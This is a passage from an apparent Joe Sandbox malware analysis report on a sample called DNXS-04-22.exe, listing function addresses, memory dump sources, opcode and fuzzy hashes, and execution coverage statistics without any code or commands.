Instruction ID: f10aded9021688c1b17e9000ed037c7de82bf1e977027bea106ca66cd2591f2e
Opcode Fuzzy Hash: 0b8ff2a69b95e1de19a537cd3cadfd4c274f0949b9d014a46cef01b1b8d261fb
Instruction Fuzzy Hash: 5FE07D6460C3814FD3025FB59C251767FA9AF4520134E80D5F5C4CB1D3DD28C804D766

Uniqueness

Uniqueness Score: -1.00%

Function 07F342B8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c6f96bb552daf5bedaea2d8a1834fea530540e964cb3e0b23e54a084fcdf1e
Instruction ID: dca3264d7307966b503bb2777993c112650668b0b5db258c5b47f2a64f55dfa3
Opcode Fuzzy Hash: c0c6f96bb552daf5bedaea2d8a1834fea530540e964cb3e0b23e54a084fcdf1e
Instruction Fuzzy Hash: 4AD05E3B105218AF8B029B89DC44CC6FFDAEF0D270309C097F20D4B232C6639960EB91

Uniqueness

Uniqueness Score: -1.00%

Function 07F3AF60 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13db4315af3bd48e2b2193e2c110577ce40ff9789fb407da2dfcce9cf1061fec
Instruction ID: b0d8ec5c20a7a15325ac26a7a37c4e515228427e3bb763655095dc915d2b02f4
Opcode Fuzzy Hash: 13db4315af3bd48e2b2193e2c110577ce40ff9789fb407da2dfcce9cf1061fec
Instruction Fuzzy Hash: 0ED05E317442244BC709AA48A41079ABACE8FC9751F04806BE50D8B381CAE19C4046E5

Uniqueness

Uniqueness Score: -1.00%

Function 07F3B488 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f45c56a5c84042809426b5d526b3f17aba14690e24817216e1470c82ce4cb6
Instruction ID: 1cae30a4ff5c163c42d47fc3b83ac2b29e0e65ad17217abf4e05fdff08175c16
Opcode Fuzzy Hash: 38f45c56a5c84042809426b5d526b3f17aba14690e24817216e1470c82ce4cb6
Instruction Fuzzy Hash: 75D0A7BF0452459FC7031FA0F9389847FA19F4523030E8783E0748B1F3C6164924E745

Uniqueness

Uniqueness Score: -1.00%

Function 07F33174 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9cb6d8ebc1e0edd60626c891c1f1075aad331b983868ae144fa4f93f0227a5
Instruction ID: 822f51e5af9c80f64a5bbc224451bcf214bed7f0b44f89994fa4b8ea1988d558
Opcode Fuzzy Hash: 3d9cb6d8ebc1e0edd60626c891c1f1075aad331b983868ae144fa4f93f0227a5
Instruction Fuzzy Hash: 13D0A7722001247BD50132849C00AAA7A1CFB85A54F585045F3045A202D553DC038796

Uniqueness

Uniqueness Score: -1.00%

Function 07F3BB60 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebbd09c4f6e22562f9643b2adadb064b6af62a66efe3ce255ff1ec9f39c8167
Instruction ID: aff34f788073dce00b15bc38824d20d2b2439f1dbda0656f76272f43d2caf301
Opcode Fuzzy Hash: 2ebbd09c4f6e22562f9643b2adadb064b6af62a66efe3ce255ff1ec9f39c8167
Instruction Fuzzy Hash: 21D0A7747142168797006FB6580627A37DEAB84741349C015B545C6285DE34D844A696

Uniqueness

Uniqueness Score: -1.00%

Function 07F39FA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57b97cd16ebec48c5f866cbdac101078dd0e85fe031cf07eda4426bee2d7179
Instruction ID: 8aee5c51f4fa8d24ded3109060110682cd0e868119eafbc0683ed9546840b193
Opcode Fuzzy Hash: c57b97cd16ebec48c5f866cbdac101078dd0e85fe031cf07eda4426bee2d7179
Instruction Fuzzy Hash: C2D022B13002288BCB055A36B40C3AF7B8CAB9066AF0CC036F41182280CFF49841CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 07F39EE0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fe0fca0f1b453b27573caa8c462fea12901ffea61d99316f57ffec5082183
Instruction ID: a7b21fc4c79deda75b8b883b10358b7d822c0d4c3b3058184ae2dc8553a764e6
Opcode Fuzzy Hash: 693fe0fca0f1b453b27573caa8c462fea12901ffea61d99316f57ffec5082183
Instruction Fuzzy Hash: 61D0C9363401289F87059F6CE404CA97BA9EF9D661301416AF905C7371CA71DC51CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 07F31073 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d60345338b49ff62aea3b221d124c3a03467c537b34cdd81d41679e16505a06
Instruction ID: c381cd0db436b3848b008cfb192f4101317620c6af203ecd7f0ff5d06ba09e41
Opcode Fuzzy Hash: 5d60345338b49ff62aea3b221d124c3a03467c537b34cdd81d41679e16505a06
Instruction Fuzzy Hash: C8C08C2230012953C5042089E811A9B328EC784920F090027A20883B40CC828C0002DB

Uniqueness

Uniqueness Score: -1.00%

Function 07F31078 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00e6e91351f28a3a49c81804004e223fbf1ae8663291428c59f45b449127de2
Instruction ID: 5575e5d0c227afc4ff9c40dab901583a64a6268a840115e759b070a154a6be2c
Opcode Fuzzy Hash: c00e6e91351f28a3a49c81804004e223fbf1ae8663291428c59f45b449127de2
Instruction Fuzzy Hash: 5AB0922271423E53DA08319EA820AAF728ECB89E60F09016BE60D877858DC79C4102EE

Uniqueness

Uniqueness Score: -1.00%

Function 07F3DA0E Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bfc0481e660cae85692d226f400bcab12abd075592a6cab080ab98e2ea3f8f4
Instruction ID: ec5668d915e4ba8fe3163d9df1e0e0934768796d0e274ed75cfe824493cf369c
Opcode Fuzzy Hash: 7bfc0481e660cae85692d226f400bcab12abd075592a6cab080ab98e2ea3f8f4
Instruction Fuzzy Hash: C5900252246182C2970215A88905D5F5A8904430D075C15C28492C8901D04D80868512

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 075BAD00 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

2:A,, xrefs: 075BAD5B

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID: 2:A,
API String ID: 0-2300616151
Opcode ID: 9350d119153595d0af4e1628d5e4b5e12ea6af4ecc68d2c9b15c4803dfb5d330
Instruction ID: e8805238fa30c97370ae2542f9f3f894bc7ad74583b7e96a13d3bfb0382f6fa8
Opcode Fuzzy Hash: 9350d119153595d0af4e1628d5e4b5e12ea6af4ecc68d2c9b15c4803dfb5d330
Instruction Fuzzy Hash: B0E1FAB4E002598FDB24DFA9C5809EEFBB2FF89305F248169D414AB355D730A942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 075BA8AA Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ad47d834650e097d5a46a3dda207f4fd0b2b54ec9c66e3caac371888191290
Instruction ID: 62df4525aaa7710c3dc80fa35db296385c922124d23ab614220f34ddec7cf531
Opcode Fuzzy Hash: b5ad47d834650e097d5a46a3dda207f4fd0b2b54ec9c66e3caac371888191290
Instruction Fuzzy Hash: 09E109B4E002598FDB14DFA9C580AEEFBB2FF89304F248169D454AB356D731A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05E50040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b30be0fdff67c2c0d62ab8a980fd8210d830c68c977f144ccf2ec30f4ff257
Instruction ID: 3c779a4fb39bdeff5f9c5fa16417ab476045f2ee2677c932300a843ba513be78
Opcode Fuzzy Hash: 43b30be0fdff67c2c0d62ab8a980fd8210d830c68c977f144ccf2ec30f4ff257
Instruction Fuzzy Hash: 5D12C6B0C817458AE338CF25F84C9993BA1F7A5324BD25B09C2612B3E1E7B5196EDF44

Uniqueness

Uniqueness Score: -1.00%

Function 075BB570 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d64444f7c3a14f90c9079a7c13ce0c84d6d3c61e64e88fdf7fbd4c1edb272c
Instruction ID: dcb95d89037864d36a3213b5022f2c8122bc9e7f0168ae240df50dd2b121713b
Opcode Fuzzy Hash: 92d64444f7c3a14f90c9079a7c13ce0c84d6d3c61e64e88fdf7fbd4c1edb272c
Instruction Fuzzy Hash: 97E118B4E002598FDB24DFA9C580AEEFBB2FF89304F248169D414AB355D730A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 075BB138 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2051443eb89c9d25aa768b6711105f3f6993eadc7f1f96d5567e6e07db661039
Instruction ID: 24e698ad861e142e196918ef4473d7202762070157a7ab52d387640e9c6dfe38
Opcode Fuzzy Hash: 2051443eb89c9d25aa768b6711105f3f6993eadc7f1f96d5567e6e07db661039
Instruction Fuzzy Hash: 94E129B4E002598FDB24DFA9C580AEEFBB2FF89305F248169D414AB355D731A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 075BCD70 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a62abf6fd43c794c67b1015aa6fc7347e4bb5f7652c15f6911b5ff032589e95c
Instruction ID: befcf32660f558b17115f409474374a4abdb21609f032ebc05ab3e7ecb187dd7
Opcode Fuzzy Hash: a62abf6fd43c794c67b1015aa6fc7347e4bb5f7652c15f6911b5ff032589e95c
Instruction Fuzzy Hash: 09E11AB4E002598FDB24DFA9C590AEEFBB2FF89305F248169D414AB355D730A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 075B20A0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a37bd0ebed240a6aa47b17df556c8f61959bc7f372748af958461a4b4d76a4
Instruction ID: 9a441125175ecab47bf6a9c70b7cc81776df82ef583342cff83624dae4dd6e5f
Opcode Fuzzy Hash: d2a37bd0ebed240a6aa47b17df556c8f61959bc7f372748af958461a4b4d76a4
Instruction Fuzzy Hash: 8BD1043592076A8ACB01EF64D8506DAB7B1FF95300F24D79AE4097B215FB706AC4CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02C5DF14 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba9c145570d47532c51521c7a2028464e9843758a3dd7405c29e8bd424ee1c9
Instruction ID: c02501c7c5c0c64a3b9b3c73252f85bc119d21f25657847b38e031dc02204869
Opcode Fuzzy Hash: aba9c145570d47532c51521c7a2028464e9843758a3dd7405c29e8bd424ee1c9
Instruction Fuzzy Hash: 08A17E32E003258FCF19DFB5C8445AEB7B2FF85304B15856AE806AB265DB71E995CF80

Uniqueness

Uniqueness Score: -1.00%

Function 075B20B0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3b229536797b8ad9a0f96c26493586b94ef9deb0044d8f485c667ff2e328f5
Instruction ID: 218287dcf51b0c38bc7239da689035f5ca9ce5de4a7bf81e31f62e8758f52979
Opcode Fuzzy Hash: fb3b229536797b8ad9a0f96c26493586b94ef9deb0044d8f485c667ff2e328f5
Instruction Fuzzy Hash: 7BD1E33592076A8ACB01EF64D850ADAB7B1FF95300F24D79AE4097B215FB706AC4CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05E50006 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c56515867108f9634433fe26c518f77e2f87074fd34174b6bfee59f1de45607
Instruction ID: 9501777cc05fe0e7bbd33f9e35c659f1bb75a81391722b0b698872e8043ffb5d
Opcode Fuzzy Hash: 6c56515867108f9634433fe26c518f77e2f87074fd34174b6bfee59f1de45607
Instruction Fuzzy Hash: 64C139B0C817458BD728CF25F8489993BB1FBA5324F925B09D1616B3E1EBB4186EDF40

Uniqueness

Uniqueness Score: -1.00%

Function 07FD7137 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422838ee95fbf9b73fa1a8eead355da04e5f74521b6e5e8d97dcfda6fa643ce1
Instruction ID: fac6b7054798140d8f024774787637f9c53855b3ae1550d013ee35808d268173
Opcode Fuzzy Hash: 422838ee95fbf9b73fa1a8eead355da04e5f74521b6e5e8d97dcfda6fa643ce1
Instruction Fuzzy Hash: 40611BB4A002198FDB09EFBBE85169EBBF3BBD4240F14C229D404AB369EB7458058B55

Uniqueness

Uniqueness Score: -1.00%

Function 07FD7138 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aabe1e8fb18ce26c09f2a90e407ade61227ea7ea38956e240a91615b61b4625
Instruction ID: 2c3937f4946aab9e7a2a7d379d065bc409f149042e88859b38cb737b48bed8dd
Opcode Fuzzy Hash: 2aabe1e8fb18ce26c09f2a90e407ade61227ea7ea38956e240a91615b61b4625
Instruction Fuzzy Hash: CE611BB4A002198FDB09EFBBE85169EBBF3BBD4240F14C229D404AB369EB7458058B55

Uniqueness

Uniqueness Score: -1.00%

Function 075BB128 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05277715b259d0a9874c9e5d5557a7dfc9d82bf159e057d18fb4410f935cd630
Instruction ID: b0cf07e8d1b97231f3d0d46fa6a0f3e734e17d3018e2dacca000bce5ac9d4fe6
Opcode Fuzzy Hash: 05277715b259d0a9874c9e5d5557a7dfc9d82bf159e057d18fb4410f935cd630
Instruction Fuzzy Hash: FB51E9B4E042598FDB14CFA9C9815EEFBB2FF89304F24816AD418AB355D7319942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07FD74C0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe35f7f009ac0daad4baf316fdecbf352e7b66e559e7f730c72a8af7c14fed6f
Instruction ID: 3df89e0cbd2fd0e7acf5746dd6fc5b4782e0bfb95a900cb02ea25690dca13364
Opcode Fuzzy Hash: fe35f7f009ac0daad4baf316fdecbf352e7b66e559e7f730c72a8af7c14fed6f
Instruction Fuzzy Hash: 075193B5D016188BEB68CF2AD95479DBAF3BFC8200F14C1EAC40DA7264DB754A95CF10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DNXS-04-22.exePID: 7264, Parent PID: 5288COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	10.5%
Total number of Nodes:	133
Total number of Limit Nodes:	13

Executed Functions

Function 067789B0 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9096f7fcab65ac095b3a1589f11b1dd1320301f41463da3f7d217cead08e5c26
Instruction ID: 34c8493bf847a2999b009cd2b6e4b320d7190167402128fbe0543b2c5cbf0f22
Opcode Fuzzy Hash: 9096f7fcab65ac095b3a1589f11b1dd1320301f41463da3f7d217cead08e5c26
Instruction Fuzzy Hash: 4BF1D474E00218CFDB64DFA9C884B9DFBB2BF88304F1481A9E408AB355DB759986CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00D08A58 Relevance: 1.8, APIs: 1, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00D08C48

Memory Dump Source

Source File: 00000004.00000002.3785339684.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d00000_DNXS-04-22.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 27be33f1b6319bd79a3f82915206c207fadad74bc540ee4c1c90f9b40d42aecb
Instruction ID: 14e26db33791655f03dacbbf8e429c35a08ddc12095308d8020566d8a4f5b1e0
Opcode Fuzzy Hash: 27be33f1b6319bd79a3f82915206c207fadad74bc540ee4c1c90f9b40d42aecb
Instruction Fuzzy Hash: 8AE1C274E00218CFEB54DFA9C894B9DBBB2BF89300F2081AAD409A7395DB355E85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0677BE28 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0677BE79

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b2542eb34374c185244060a4b75562e4239c9ed438c69bc9e24896614150a2b
Instruction ID: bd152be5b594baf6856b9a7ab1f46988144b7333b6030e5a05c1cfc94eabc7f0
Opcode Fuzzy Hash: 9b2542eb34374c185244060a4b75562e4239c9ed438c69bc9e24896614150a2b
Instruction Fuzzy Hash: FD4107B4E002089FDB14CF99D584ADDFBB6FF88314F248169E408AB395D771A986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028C98B8 Relevance: .9, Instructions: 862COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eae524ad9911154aae4191c322a38d081e7db6fbdcbcdc5681dbc3bd1d27f7f
Instruction ID: 3ed10b7eefcba953aae74f12dda650ac62fc547c0dc4ba0bb8eaba5034499600
Opcode Fuzzy Hash: 1eae524ad9911154aae4191c322a38d081e7db6fbdcbcdc5681dbc3bd1d27f7f
Instruction Fuzzy Hash: 19728E7CA00219CFCB19CFA8C884AAEBBF2FF89314F258559E405DB2A5D731E951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06770040 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e5ec75e9ccf5a9b2bef272e748a5cd475e52f322ee03e1f6342815d23126e8
Instruction ID: 1890c548fe90a74ad812f29acda9d1b9cd1ef343fecdbc5dcd4529910ed622dc
Opcode Fuzzy Hash: 13e5ec75e9ccf5a9b2bef272e748a5cd475e52f322ee03e1f6342815d23126e8
Instruction Fuzzy Hash: 70728CB4E012298FDB64DF69C984BEDBBB2BB49300F1481E9D449A7355DB349E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 028C6168 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e013f3225ecb42938e2027379882f0eb681330d200a514f80fa06bfa87b0be
Instruction ID: 81a86e9e7187634b9f0f81621d7c4cb938218ec1d850218938fa4a48ef87ecd5
Opcode Fuzzy Hash: f7e013f3225ecb42938e2027379882f0eb681330d200a514f80fa06bfa87b0be
Instruction Fuzzy Hash: E2127B78A002198FDB14DF69C854BAEBBB6BFC8304F24856DE50ADB395EB34D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 028CB388 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e39ebd96014a22de22067afb71354c9db8098008db09870b235275e9431c5f
Instruction ID: 20a7ec1554856a0d5bf3224ebf86cb41a42bb689050d20f525ad17a41612170d
Opcode Fuzzy Hash: 42e39ebd96014a22de22067afb71354c9db8098008db09870b235275e9431c5f
Instruction Fuzzy Hash: 44E1E879A04658CFDB14CFA9C985A9DBBB1FF58318F2580A9E809EB361D730E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 028C68E0 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178e7d7d923207d5dcd3d03139b958cd8f65124f8c2cfb8483d9f876dcc2db51
Instruction ID: d84f513662ee4d1ef5c401a692c6176862c36055772bdf0767ca9e17376523eb
Opcode Fuzzy Hash: 178e7d7d923207d5dcd3d03139b958cd8f65124f8c2cfb8483d9f876dcc2db51
Instruction Fuzzy Hash: CAD11D7DA00129DFDB14CFA9D984AADBBFAFF88304F658069E405EB261E730D951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06770C60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623f917e0a99663fc466478472b77e9692d3158927716d03bc1ef0cb6192ce34
Instruction ID: e79eabedfdbddded5a8fa8ee3fc90bb67b1743ee1cd33e970008e1a7cad26ab0
Opcode Fuzzy Hash: 623f917e0a99663fc466478472b77e9692d3158927716d03bc1ef0cb6192ce34
Instruction Fuzzy Hash: CCC1A078E00218CFDB54DFA9D994BADBBB2FF89300F1081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06771DE0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46fce0737467a965809b97d5286b0efeccfe752e53bf08aae10fb8f8082a0dbf
Instruction ID: ed08c0cac9abf2f1fd91ddb1bca35b451e96c967fc02d1c2fbbf246093f27d2e
Opcode Fuzzy Hash: 46fce0737467a965809b97d5286b0efeccfe752e53bf08aae10fb8f8082a0dbf
Instruction Fuzzy Hash: 15C1B178E00218CFDB54DFA9D994BADBBB2FF89301F1080A9D819AB355DB355A81CF50

Uniqueness

